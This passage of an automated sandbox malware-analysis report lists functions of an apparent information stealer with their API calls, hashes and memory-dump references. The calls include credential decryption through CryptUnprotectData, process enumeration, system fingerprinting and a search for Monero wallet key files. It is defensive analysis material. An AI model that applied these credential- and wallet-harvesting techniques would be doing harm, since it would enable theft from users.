                      • Instruction ID: a590447a1137de83b38ee085b756cbfcc6d1df2f235f3cada85a5abf35b3bc44
                      • Opcode Fuzzy Hash: dfe886965b9171f28e7c5037f0b36543b6f23f5b5fa18be72d31a20d9d72b6e1
                      • Instruction Fuzzy Hash: 00210176D14208ABCF04EFE4D9499EEB7B9FF48300F04852EE41AE3250EB345605CB66
                      Function 00737240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0073724D
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00737254
                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00737281
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 007372A4
                      • LocalFree.KERNEL32(?), ref: 007372AE
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                      • String ID:
                      • API String ID: 2609814428-0
                      • Opcode ID: 9b2f2218a0caf31854d1a07b332f1862ec9d398d86ed8195758daf5f58245808
                      • Instruction ID: 844faf56e5034fc5ca511bae41131f37904dbe9cdeba50e3db689475ce56314a
                      • Opcode Fuzzy Hash: 9b2f2218a0caf31854d1a07b332f1862ec9d398d86ed8195758daf5f58245808
                      • Instruction Fuzzy Hash: F30112B6B54208BBEB14DFD4CD46F9E7778FB44701F104154FB09AB2C0D6B4AA409BA6
                      Function 00749600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                      Download Yara Rule
                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0074961E
                      • Process32First.KERNEL32(00750ACA,00000128), ref: 00749632
                      • Process32Next.KERNEL32(00750ACA,00000128), ref: 00749647
                      • StrCmpCA.SHLWAPI(?,00000000), ref: 0074965C
                      • CloseHandle.KERNEL32(00750ACA), ref: 0074967A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                      • String ID:
                      • API String ID: 420147892-0
                      • Opcode ID: b9de195f4fe36f75f4a6f2583604b45f9907551fa65819e9a5843610ecefaa02
                      • Instruction ID: 1a4e9ef66a0bcef83310bf0bdff26d2a378712e78a38afbc0d164158f4b1a5ea
                      • Opcode Fuzzy Hash: b9de195f4fe36f75f4a6f2583604b45f9907551fa65819e9a5843610ecefaa02
                      • Instruction Fuzzy Hash: 99011E75A14208EBCB14DFA5CD48BEEB7F8EB48301F104188AA0997250D7349B80DF52
                      Function 00AFC0DB Relevance: 6.7, Strings: 4, Instructions: 1688COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 2<y$OW[$ny$v$a~7
                      • API String ID: 0-1631520724
                      • Opcode ID: a2aeb4bed08d1c7ef46aa3824aff839122a0f05cca9a5d955876cf7acd9e52c6
                      • Instruction ID: d3858a650dc354d35695c79da7c49f6223ef190c76cf681798e143d2d2ce8b80
                      • Opcode Fuzzy Hash: a2aeb4bed08d1c7ef46aa3824aff839122a0f05cca9a5d955876cf7acd9e52c6
                      • Instruction Fuzzy Hash: C5B218F360C2009FE304AE29EC8567ABBE5EFD4720F1A8A3DE6C4C7744E67558018697
                      Function 00AFA6DB Relevance: 6.6, Strings: 4, Instructions: 1564COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: QW3IZRF3BDFQF81$ZWw$odo$s[_v
                      • API String ID: 0-445414117
                      • Opcode ID: 74a485938692efa6c1ce89b1571141924dcfd95f982bd717386685e97cd843ec
                      • Instruction ID: 957e3ded87c646f901046f0584590d010dda5f4103b55ae06af1db9b52794c07
                      • Opcode Fuzzy Hash: 74a485938692efa6c1ce89b1571141924dcfd95f982bd717386685e97cd843ec
                      • Instruction Fuzzy Hash: 0FB215F36082049FE304AE2DEC8577ABBE9EFD4720F1A893DE6C4C3744E67558058696
                      Function 00748EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                      Download Yara Rule
                      APIs
                      • CryptBinaryToStringA.CRYPT32(00000000,00735184,40000001,00000000,00000000,?,00735184), ref: 00748EC0
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: BinaryCryptString
                      • String ID:
                      • API String ID: 80407269-0
                      • Opcode ID: bfa811857441aaf199253551e278fb78883162fc4c8ad607e6bab394a637991e
                      • Instruction ID: 1b6171c79ca659d935af32f6afdddbf28650493005a91f96fd8cce8071886f46
                      • Opcode Fuzzy Hash: bfa811857441aaf199253551e278fb78883162fc4c8ad607e6bab394a637991e
                      • Instruction Fuzzy Hash: 64110675204208BFDB40CF64D884FAA33A9BF89700F109448F9198B250DB79E885EB62
                      Function 00747A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,013EDF28,00000000,?,00750E10,00000000,?,00000000,00000000), ref: 00747A63
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00747A6A
                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,013EDF28,00000000,?,00750E10,00000000,?,00000000,00000000,?), ref: 00747A7D
                      • wsprintfA.USER32 ref: 00747AB7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                      • String ID:
                      • API String ID: 3317088062-0
                      • Opcode ID: 594f8df7ac21388ca143aee91af7e2b18dceb80e77b34837aa37bc6fd05c8a93
                      • Instruction ID: 53553de3a79b1f70463da2062d917d9885e859450eb2732c1f0e2142222a8369
                      • Opcode Fuzzy Hash: 594f8df7ac21388ca143aee91af7e2b18dceb80e77b34837aa37bc6fd05c8a93
                      • Instruction Fuzzy Hash: 921182B1A49218DBDB208B54DC49F99B778F744711F104399E90A932C0C7781E40CF51
                      Function 00743720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                      Download Yara Rule
                      APIs
                      • CoCreateInstance.COMBASE(0074E118,00000000,00000001,0074E108,00000000), ref: 00743758
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 007437B0
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ByteCharCreateInstanceMultiWide
                      • String ID:
                      • API String ID: 123533781-0
                      • Opcode ID: c2b59b84f87cc31e7cce4156c6c0f66cc3e720139e00244997fc55eb4435cb6c
                      • Instruction ID: 77413b6f36953888d3a55742da3d0c5e1c4de17b60d52d0d4230c41e4731ac0c
                      • Opcode Fuzzy Hash: c2b59b84f87cc31e7cce4156c6c0f66cc3e720139e00244997fc55eb4435cb6c
                      • Instruction Fuzzy Hash: D441F771A40A289FDB24DB58CC98B9BB7B4BB48702F5041D8E618E72D0E771AEC5CF50
                      Function 00739B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                      Download Yara Rule
                      APIs
                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00739B84
                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 00739BA3
                      • LocalFree.KERNEL32(?), ref: 00739BD3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Local$AllocCryptDataFreeUnprotect
                      • String ID:
                      • API String ID: 2068576380-0
                      • Opcode ID: 67e323a2c7c0428f1ab15689cf4fa4a21b07d95d749687cd72e1f81dad7009a8
                      • Instruction ID: 829fcac961644b0163bd4445bbe4360644128c97bfb3eda121b07475fa73d1d1
                      • Opcode Fuzzy Hash: 67e323a2c7c0428f1ab15689cf4fa4a21b07d95d749687cd72e1f81dad7009a8
                      • Instruction Fuzzy Hash: EC11CCB9A00209DFDB04DF94D985AAEB7B9FF88300F104558E91597354D774AE50CF61
                      Function 00B07E9C Relevance: 3.9, Strings: 2, Instructions: 1438COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: nO8@$z)s}
                      • API String ID: 0-993586279
                      • Opcode ID: b7389914acd57014dc2d8cbd2c37db7635bcafec25235db241c08f48376c932d
                      • Instruction ID: 7ef99921d19cc504bcdf219cbec8bad901ae6296d1f60a3882b25d5ff52e6d24
                      • Opcode Fuzzy Hash: b7389914acd57014dc2d8cbd2c37db7635bcafec25235db241c08f48376c932d
                      • Instruction Fuzzy Hash: 37A207F360C204AFE3046E29EC85B7ABBE5EF94720F1A493DE6C4C7744EA3558058697
                      Function 00B05525 Relevance: 1.7, Strings: 1, Instructions: 498COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: Oyg
                      • API String ID: 0-2041403369
                      • Opcode ID: 35d356bdad648482d51f4a84b111c9568337de9808d6f3ab4a7f07fdd6fa03c1
                      • Instruction ID: c5db6e8378abf4bf6c7981c7b89d8fb588a774f48d5b1199a59ed615cac800a5
                      • Opcode Fuzzy Hash: 35d356bdad648482d51f4a84b111c9568337de9808d6f3ab4a7f07fdd6fa03c1
                      • Instruction Fuzzy Hash: 4AF128F390C204AFE314AF28DC45A7ABBE5EF94720F1A893DE6C5C3740E63558158697
                      Function 0073F68A Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                        • Part of subcall function 0074A920: lstrcat.KERNEL32(00000000), ref: 0074A982
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,007515B8,00750D96), ref: 0073F71E
                      • StrCmpCA.SHLWAPI(?,007515BC), ref: 0073F76F
                      • StrCmpCA.SHLWAPI(?,007515C0), ref: 0073F785
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0073FAB1
                      • FindClose.KERNEL32(000000FF), ref: 0073FAC3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID:
                      • API String ID: 3334442632-0
